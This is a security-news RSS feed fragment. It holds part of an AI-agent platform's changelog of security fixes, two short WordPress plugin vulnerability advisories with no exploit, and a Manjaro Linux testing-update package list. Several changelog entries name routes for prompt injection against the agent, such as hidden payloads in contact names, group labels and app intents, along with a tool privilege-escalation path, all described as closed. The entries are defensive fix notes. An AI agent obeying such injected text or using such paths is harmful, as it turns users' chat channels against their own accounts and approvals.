<li>Pairing/security: require private-IP or loopback hosts for cleartext mobile pairing, and stop treating <code>.local</code> or dotless hostnames as safe cleartext endpoints. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317933544" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70721" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70721/hovercard" href="https://github.com/openclaw/openclaw/pull/70721">#70721</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/security: stop setup-api lookup from falling back to the launch directory, so workspace-local <code>extensions/&lt;plugin&gt;/setup-api.*</code> files cannot be executed during provider setup resolution. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317905776" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70718" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70718/hovercard" href="https://github.com/openclaw/openclaw/pull/70718">#70718</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Approvals/security: require explicit chat exec-approval enablement instead of auto-enabling approval clients just because approvers resolve from config or owner allowlists. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317765259" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70715" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70715/hovercard" href="https://github.com/openclaw/openclaw/pull/70715">#70715</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Discord/security: keep native slash-command channel policy from bypassing configured owner or member restrictions, while preserving channel-policy fallback when no stricter access rule exists. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317763069" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70711" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70711/hovercard" href="https://github.com/openclaw/openclaw/pull/70711">#70711</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Android/security: stop <code>ASK_OPENCLAW</code> intents from auto-sending injected prompts, so external app actions only prefill the draft instead of dispatching it immediately. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317764736" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70714" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70714/hovercard" href="https://github.com/openclaw/openclaw/pull/70714">#70714</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Secrets/Windows: strip UTF-8 BOMs from file-backed secrets and keep unavailable ACL checks fail-closed unless trusted file or exec providers explicitly opt into <code>allowInsecurePath</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317129545" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70662" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70662/hovercard" href="https://github.com/openclaw/openclaw/pull/70662">#70662</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhanggpcsu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhanggpcsu">@zhanggpcsu</a>.</li>
<li>Agents/image generation: escape ignored override values in tool warnings so parsed <code>MEDIA:</code> directives cannot be injected through unsupported model options. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317762579" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70710" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70710/hovercard" href="https://github.com/openclaw/openclaw/pull/70710">#70710</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>QQBot/security: require framework auth for <code>/bot-approve</code> so unauthorized QQ senders cannot change exec approval settings through the unauthenticated pre-dispatch slash-command path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317735442" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70706" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70706/hovercard" href="https://github.com/openclaw/openclaw/pull/70706">#70706</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>MCP/tools: stop the ACPX OpenClaw tools bridge from listing or invoking owner-only tools such as <code>cron</code>, closing a privilege-escalation path for non-owner MCP callers. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317612919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70698" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70698/hovercard" href="https://github.com/openclaw/openclaw/pull/70698">#70698</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Feishu/onboarding: load Feishu setup surfaces through a setup-only barrel so first-run setup no longer imports Feishu's Lark SDK before bundled runtime deps are staged. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311786128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70339" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70339/hovercard" href="https://github.com/openclaw/openclaw/pull/70339">#70339</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andrejtr/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andrejtr">@andrejtr</a>.</li>
<li>Approvals/startup: let native approval handlers report ready after gateway authentication while replaying pending approvals in the background, so slow or failing replay delivery no longer blocks handler startup or amplifies reconnect storms.</li>
<li>WhatsApp/security: keep contact/vCard/location structured-object free text out of the inline message body and render it through fenced untrusted metadata JSON, limiting hidden prompt-injection payloads in names, phone fields, and location labels/comments.</li>
<li>Group-chat/security: keep channel-sourced group names and participant labels out of inline group system prompts and render them through fenced untrusted metadata JSON.</li>
<li>Agents/replay: preserve Kimi-style <code>functions.&lt;name&gt;:&lt;index&gt;</code> tool-call IDs during strict replay sanitization so custom OpenAI-compatible Kimi routes keep multi-turn tool use intact. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317536165" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70693" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70693/hovercard" href="https://github.com/openclaw/openclaw/pull/70693">#70693</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/geri4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/geri4">@geri4</a>.</li>
<li>Discord/replies: preserve final reply permission context through outbound delivery so Discord replies keep the same channel/member routing rules at send time.</li>
<li>Plugins/startup: restore bundled plugin <code>openclaw/plugin-sdk/*</code> resolution from packaged installs and external runtime-deps stage roots, so Telegram/Discord no longer crash-loop with <code>Cannot find package 'openclaw'</code> after missing dependency repair. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319745436" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70852" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70852/hovercard" href="https://github.com/openclaw/openclaw/pull/70852">#70852</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simonemacario/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simonemacario">@simonemacario</a>.</li>
<li>CLI/Claude: run the same prompt-build hooks and trigger/channel context on <code>claude-cli</code> turns as on direct embedded runs, keeping Claude Code sessions aligned with OpenClaw workspace identity, routing, and hook-driven prompt mutations. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316475365" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70625" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70625/hovercard" href="https://github.com/openclaw/openclaw/pull/70625">#70625</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Discord/plugin startup: keep subagent hooks lazy behind Discord's channel entry so packaged entry imports stay narrow and report import failures with the channel id and entry path.</li>
<li>Memory/doctor: keep root durable memory canonicalized on <code>MEMORY.md</code>, stop treating lowercase <code>memory.md</code> as a runtime fallback, and let <code>openclaw doctor --fix</code> merge true split-brain root files into <code>MEMORY.md</code> with a backup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316390163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70621" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70621/hovercard" href="https://github.com/openclaw/openclaw/pull/70621">#70621</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Providers/Anthropic Vertex: restore ADC-backed model discovery after the lightweight provider-discovery path by resolving emitted discovery entries, exposing synthetic auth on bootstrap discovery, and honoring copied env snapshots when probing the default GCP ADC path. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251357682" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65715" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65715/hovercard" href="https://github.com/openclaw/openclaw/issues/65715">#65715</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4251358554" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65716" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65716/hovercard" href="https://github.com/openclaw/openclaw/pull/65716">#65716</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/feiskyer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/feiskyer">@feiskyer</a>.</li>
<li>Codex harness/status: pin embedded harness selection per session, show active non-PI harness ids such as <code>codex</code> in <code>/status</code>, and keep legacy transcripts on PI until <code>/new</code> or <code>/reset</code> so config changes cannot hot-switch existing sessions.</li>
<li>Gateway/security: fail closed on agent-driven <code>gateway config.apply</code>/<code>config.patch</code> runtime edits by allowlisting a narrow set of agent-tunable prompt, model, and mention-gating paths (including Telegram topic-level <code>requireMention</code>) instead of relying on a hand-maintained denylist of protected subtrees that could miss new sensitive config keys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317956002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70726" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70726/hovercard" href="https://github.com/openclaw/openclaw/pull/70726">#70726</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Webhooks/security: re-resolve <code>SecretRef</code>-backed webhook route secrets on each request so <code>openclaw secrets reload</code> revokes the previous secret immediately instead of waiting for a gateway restart. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4317967302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70727" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70727/hovercard" href="https://github.com/openclaw/openclaw/pull/70727">#70727</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-4512 | WebDesignBy reCaptcha Plugin up to 1.x on WordPress Setting grecaptcha_js cross site scripting (EUVD-2026-25197)]]></title>
<description><![CDATA[A vulnerability was found in WebDesignBy reCaptcha Plugin up to 1.x on WordPress. It has been rated as problematic. This issue affects the function grecaptcha_js of the component Setting Handler. Performing a manipulation results in cross site scripting.

This vulnerability is identified as CVE-2...]]></description>
<link>https://tsecurity.de/de/3457415/sicherheitsluecken/cve-2026-4512-webdesignby-recaptcha-plugin-up-to-1x-on-wordpress-setting-grecaptchajs-cross-site-scripting-euvd-2026-25197/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3457415/sicherheitsluecken/cve-2026-4512-webdesignby-recaptcha-plugin-up-to-1x-on-wordpress-setting-grecaptchajs-cross-site-scripting-euvd-2026-25197/</guid>
<pubDate>Thu, 23 Apr 2026 11:08:07 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/webdesignby:recaptcha_plugin">WebDesignBy reCaptcha Plugin up to 1.x</a> on WordPress. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. This issue affects the function <code>grecaptcha_js</code> of the component <em>Setting Handler</em>. Performing a manipulation results in cross site scripting.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-4512">CVE-2026-4512</a>. The attack can be initiated remotely. There is not any exploit available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-6959 | Getwid Gutenberg Blocks Plugin up to 2.0.4 on WordPress Recaptcha API Key Modification authorization (ID 3022982)]]></title>
<description><![CDATA[A vulnerability was found in Getwid Gutenberg Blocks Plugin up to 2.0.4 on WordPress. It has been classified as problematic. This impacts an unknown function of the component Recaptcha API Key Modification. Performing a manipulation results in missing authorization.

This vulnerability was named ...]]></description>
<link>https://tsecurity.de/de/3426607/sicherheitsluecken/cve-2023-6959-getwid-gutenberg-blocks-plugin-up-to-204-on-wordpress-recaptcha-api-key-modification-authorization-id-3022982/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3426607/sicherheitsluecken/cve-2023-6959-getwid-gutenberg-blocks-plugin-up-to-204-on-wordpress-recaptcha-api-key-modification-authorization-id-3022982/</guid>
<pubDate>Sat, 11 Apr 2026 23:22:03 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/getwid:gutenberg_blocks_plugin">Getwid Gutenberg Blocks Plugin up to 2.0.4</a> on WordPress. It has been classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This impacts an unknown function of the component <em>Recaptcha API Key Modification</em>. Performing a manipulation results in missing authorization.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2023-6959">CVE-2023-6959</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-03-31 - Linux 7.0-rc6, GNOME, Thunderbird, Deepin, Freecad, Wireplumber]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. This might mark the start of the development cycle of the upcoming ‘Bian-May’ release series. With this we aim to update the default kernel to 7.0 series. Also there will be Plasma 6.6 series, KDE Gears 26.04 and GNOME 50 ...]]></description>
<link>https://tsecurity.de/de/3409930/unix-server/testing-update-2026-03-31-linux-70-rc6-gnome-thunderbird-deepin-freecad-wireplumber/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3409930/unix-server/testing-update-2026-03-31-linux-70-rc6-gnome-thunderbird-deepin-freecad-wireplumber/</guid>
<pubDate>Mon, 06 Apr 2026 01:00:56 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. This might mark the start of the development cycle of the upcoming ‘Bian-May’ release series. With this we aim to update the default kernel to <a href="https://www.heise.de/en/news/Linux-Torvalds-starts-development-of-Kernel-7-0-11186358.html">7.0</a> series. Also there will be <a href="https://kde.org/announcements/plasma/6/6.6.0/">Plasma 6.6</a> series, <a href="https://community.kde.org/Schedules/KDE_Gear_26.04_Schedule">KDE Gears 26.04</a> and <a href="https://release.gnome.org/50/">GNOME 50</a> release series. XFCE will stay at <a href="https://www.xfce.org/about/tour420">4.20</a> this release cycle. A release of ‘Bian-May’ can be expected end of April, beginning of May. Let us know any issues you may found thus far …</p>
<h3><a name="p-850257-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-850257-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-850257-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-850257-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-gnome-thunderbird-deepin-freecad-wireplumber/186720/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-gnome-thunderbird-deepin-freecad-wireplumber/186720/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-gnome-thunderbird-deepin-freecad-wireplumber/186720/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-gnome-thunderbird-deepin-freecad-wireplumber/186720/1">(click for more details)</a>
<h2><a name="p-850257-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-850257-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernel</strong> 7.0 got updated to <a href="https://lore.kernel.org/lkml/CAHk-=wgLvq1LucHhxjiPwDBkMRk=54Zh=-FmUdevXJyHygc=9A@mail.gmail.com/T/#u">7.0-rc6</a></li>
<li><strong>GNOME</strong> <a href="https://discourse.gnome.org/t/gnome-49-5-released/34574">49.5</a></li>
<li><strong>Thunderbird</strong> <a href="https://www.thunderbird.net/thunderbird/149.0.1/releasenotes/">149.0.1</a></li>
<li>Some updates to <strong>Deepin</strong></li>
<li><strong>freecad</strong> <a href="https://blog.freecad.org/2026/03/25/freecad-version-1-1-released/">1.1.0</a></li>
<li>Rebuilds and updates to <strong>haskell</strong></li>
<li><strong>wireplumber</strong> <a href="https://gitlab.com/pipewire/wireplumber/-/blob/07e730b279ac7a520699ae9f6b0797848a731b30/NEWS.rst">0.5.14</a></li>
</ul>
<h2><a name="p-850257-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-850257-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-gnome-thunderbird-deepin-freecad-wireplumber/186720/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-gnome-thunderbird-deepin-freecad-wireplumber/186720/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux510 5.10.252</li>
<li>linux515 5.15.202</li>
<li>linux61 6.1.167</li>
<li>linux66 6.6.130</li>
<li>linux612 6.12.78</li>
<li>linux618 6.18.20</li>
<li>linux619 6.19.10</li>
<li>linux70 7.0.0rc6</li>
<li>linux61-rt 6.1.166_rt61</li>
<li>linux66-rt 6.6.129_rt70</li>
<li>linux612-rt 6.12.74_rt16</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (3/31/26 05:17 CEST)</p>
<ul>
<li>testing core x86_64:  3 new and 3 removed package(s)</li>
<li>testing extra x86_64:  1131 new and 1127 removed package(s)</li>
<li>testing multilib x86_64:  8 new and 8 removed package(s)</li>
</ul>
<pre><code class="lang-auto">:: Different overlay package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                             linux70           7.0.0rc5-1           7.0.0rc6-1
                     linux70-headers           7.0.0rc5-1           7.0.0rc6-1


:: Different sync package(s) in repository core x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                                file               5.47-1               5.47-2


:: Different overlay package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                             discord          1:0.0.131-1                    -
                   linux70-acpi_call            1.2.2-0.5            1.2.2-0.6
                    linux70-bbswitch              0.8-0.5              0.8-0.6
                 linux70-broadcom-wl     6.30.223.271-0.5     6.30.223.271-0.6
                linux70-nvidia-470xx       470.256.02-0.5       470.256.02-0.6
                 linux70-nvidia-open        595.58.03-0.1        595.58.03-0.2
                       linux70-r8168         8.056.02-0.5         8.056.02-0.6
                   linux70-rtl8723bu         20250813-0.5         20250813-0.6
                    linux70-tp_smapi             0.45-0.5             0.45-0.6
                 linux70-vhba-module         20250329-0.5         20250329-0.6
     linux70-virtualbox-host-modules            7.2.6-0.5            7.2.6-0.6
                         linux70-zfs            2.4.1-0.5            2.4.1-0.6


:: Different sync package(s) in repository extra x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                          abseil-cpp         20250814.1-1         20260107.1-1
                               afl++              4.35c-2              4.40c-1
                                agda          2.6.4.3-119          2.6.4.3-121
                          aliyun-cli              3.2.9-1              3.3.3-1
                              allure         0.11.0.0-317         0.11.0.0-320
                          amdgpu_top             0.11.2-1             0.11.3-1
                       android-tools            35.0.2-23            35.0.2-24
                          apache-orc              2.3.0-2              2.3.0-3
                                apko             1.1.16-1              1.2.0-1
                               arbtt         0.12.0.3-185         0.12.0.3-187
                             arch-hs            0.12.1-66            0.12.1-70
                      argo-workflows              4.0.2-1              4.0.3-1
                               arrow             23.0.1-2             23.0.1-3
                             astroid               0.17-8               0.17-9
                           astroterm             1.0.10-1              1.1.0-1
                           aws-vault              7.9.7-1             7.9.13-1
                              azcopy            10.32.1-1            10.32.2-1
                       bbswitch-dkms              0.8-806              0.8-807
                       bcachefs-dkms           3:1.37.3-1           3:1.37.4-1
                      bcachefs-tools           3:1.37.3-1           3:1.37.4-1
                               beets              2.7.1-1              2.8.0-1
                               bftpd                6.3-1                6.6-1
                              bloaty               1.1-22               1.1-23
                            bpftrace             0.25.0-1             0.25.1-1
                                brat              0.9.0-2             0.10.0-1
                                 bun             1.3.11-1             1.3.11-2
                               byobu               6.14-1               6.15-1
                       cabal-install          3.10.3.0-15          3.10.3.0-18
                          cabal-plan          0.7.3.0-128          0.7.3.0-130
                      cargo-binstall             1.17.8-2             1.17.9-1
                         cargo-insta             1.47.0-1             1.47.2-1
                        cargo-update             18.2.0-2             19.0.1-1
                             castxml              0.7.0-1              0.7.0-2
                           cbor-tool          0.2.3.0-124          0.2.3.0-126
                              ccache             4.13.1-1             4.13.2-1
                               cgrep             8.1.0-94             8.1.0-97
                              chatty              0.8.9-1              0.8.9-2
                          cherrytree              1.6.3-1              1.6.3-2
                           clash-ghc             1.8.2-97            1.8.2-100
                          cockatrice             2.10.3-1             2.10.3-2
                               crash              9.0.1-1              9.0.1-2
                             cryptol             3.3.0-47             3.3.0-50
                                 cue             0.15.4-1             0.16.0-1
                    curl-impersonate              1.5.1-1              1.5.2-1
                                cyme             2.2.11-2              2.3.0-1
                               darcs           2.18.5-191           2.18.5-194
                             dbeaver             26.0.0-1             26.0.1-1
                     deepin-anything             6.2.11-1              7.0.0-2
                deepin-anything-dkms             6.2.11-1              7.0.0-2
                          deepin-api             6.0.35-1             6.0.37-1
                 deepin-app-services             1.0.40-1             1.0.41-1
          deepin-application-manager             1.2.42-1             1.2.44-1
                     deepin-calendar             6.5.17-1             6.5.18-1
                    deepin-clipboard              6.1.7-1              6.1.8-1
                   deepin-compressor              6.5.9-1             6.5.11-1
               deepin-control-center             6.1.13-1             6.1.15-1
                       deepin-daemon             6.1.46-4             6.1.49-1
                deepin-desktop-theme             1.1.16-1             1.1.18-1
             deepin-device-formatter           0.0.1.18-2              1.5.1-1
                         deepin-draw             6.5.25-1             6.5.26-1
                       deepin-editor             6.5.41-1             6.5.42-1
                 deepin-grand-search              5.4.7-3              5.4.9-1
                    deepin-launchpad             2.0.25-3             2.0.26-1
                        deepin-movie          1:5.10.45-1          1:5.10.46-1
                 deepin-network-core             2.0.42-1             2.0.43-1
               deepin-qt5integration             5.7.30-2             6.7.31-1
          deepin-qt5platform-plugins             5.7.30-2             6.7.31-1
               deepin-qt6integration             6.0.48-3             6.7.31-1
          deepin-qt6platform-plugins             6.0.48-3             6.7.31-1
                  deepin-screensaver             5.0.19-2             5.0.20-1
                     deepin-services             1.0.19-1             1.0.21-1
                      deepin-session             2.0.15-2             2.0.17-1
                        deepin-shell             2.0.27-3             2.0.29-1
               deepin-system-monitor             6.5.19-2             6.5.21-1
                     deepin-terminal             6.5.28-3             6.5.29-1
                  deepin-tray-loader             2.0.24-3             2.0.26-1
                        deepin-turbo            0.0.6.2-1            0.0.6.3-1
                     deepin-util-dfm             1.2.29-1             1.2.31-1
                   deepin-wallpapers            1:1.7.8-1           1:1.7.14-1
                      deepin-widgets             6.0.18-2             6.0.20-1
                               dhall            1.42.3-45            1.42.3-48
                          dhall-bash           1.0.41-176           1.0.41-180
                          dhall-docs           1.0.12-168           1.0.12-171
                          dhall-json           1.7.12-172           1.7.12-175
                    dhall-lsp-server            1.1.4-102            1.1.4-106
                          dhall-yaml           1.2.12-177           1.2.12-180
                       diff-so-fancy              1.4.6-1              1.4.8-1
                          diffoscope                313-1                315-1
                             discord          1:0.0.130-1          1:0.0.131-1
                             dovecot              2.4.3-1              2.4.3-2
                               drone             2.28.0-1             2.28.1-1
                           drone-oss             2.28.0-1             2.28.1-1
                            dtk6core           1:6.7.32-2           1:6.7.33-1
                     dtk6declarative           1:6.7.32-2           1:6.7.33-1
                             dtk6gui           1:6.7.32-2           1:6.7.33-1
                             dtk6log             6.7.32-2             6.7.33-1
                          dtk6widget           1:6.7.32-2           1:6.7.33-1
                             dtkcore           1:6.7.32-2           1:6.7.33-1
                      dtkdeclarative           1:6.7.32-2           1:6.7.33-1
                              dtkgui           1:6.7.32-2           1:6.7.33-1
                              dtklog             6.7.32-2             6.7.33-1
                           dtkwidget           1:6.7.32-2           1:6.7.33-1
                               dunst             1.13.1-1             1.13.2-1
                         easyeffects              8.1.7-1              8.1.8-1
                              emptty             0.16.0-1             0.16.1-1
               evolution-data-server             3.58.3-1             3.58.3-2
          evolution-data-server-docs             3.58.3-1             3.58.3-2
                  falcosecurity-libs             0.20.0-9             0.23.1-1
                           fastfetch             2.60.0-1             2.61.0-1
           firefox-developer-edition            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-ach            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-af            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-an            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-ar            150.0b2-1            150.0b3-1
  firefox-developer-edition-i18n-ast            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-az            150.0b2-1            150.0b3-1
   firefox-developer-edition-i18n-be            150.0b2-1            150.0b3-1
